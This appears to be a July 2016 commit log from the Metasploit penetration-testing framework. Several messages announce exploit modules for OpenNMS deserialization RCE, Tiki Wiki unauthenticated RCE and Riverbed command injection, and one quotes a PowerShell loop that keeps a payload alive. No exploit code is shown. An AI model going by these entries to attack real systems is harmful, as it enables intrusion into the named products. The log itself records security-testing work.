Land #6812 , remove broken OSVDB references
2016-07-11 22:59:11 -05:00
Brent Cook
a530aa4cf1
restrict perms a bit more
2016-07-11 22:22:34 -05:00
Brent Cook
a107a0f955
remove unneeded rport/rhost defines
2016-07-11 22:22:34 -05:00
Brent Cook
6bf51fe064
streamline payload generation
2016-07-11 22:22:34 -05:00
Brent Cook
7ef6c8bf9e
ruby style updates
2016-07-11 22:22:33 -05:00
Brent Cook
c1f51e7ddf
Update and fixup module against OpenNMS-16
2016-07-11 22:22:33 -05:00
benpturner
50746eec29
Fixes comments in regards to #{peer}
2016-07-11 22:22:33 -05:00
benpturner
ce8317294f
New module to exploit the OpenNMS Java Object Unserialization RCE vulnerability. This now gets flagged inside Nessus and there was no Metasploit module to exploit this.
...
This module exploits the vulnerability to a full session.
2016-07-11 22:22:32 -05:00
khr0x40sh
7211936f96
Fix Payload exit issue
...
Fixed payload exiting issue by adding while ($true){Start-Sleep 1000};
statement.
2016-07-11 16:21:08 -04:00
Mehmet Ince
fc56ab6722
Fixing some coding style because of rubocop
2016-07-11 23:10:18 +03:00
Brendan
47f2cef22e
Syntax changes to humor rubocop and ruby style
2016-07-11 12:50:58 -07:00
Mehmet Ince
e79c3ba7c0
Tiki Wiki unauth rce
2016-07-11 22:44:07 +03:00
William Webb
52c6daa0f2
Land #7048 , Riverbed SteelCentral NetProfiler and NetExpress Remote
...
Command Injection
2016-07-10 18:54:12 -05:00
Francesco
b75084249a
Removed duplicate 'Privileged' key
2016-07-10 01:37:03 -04:00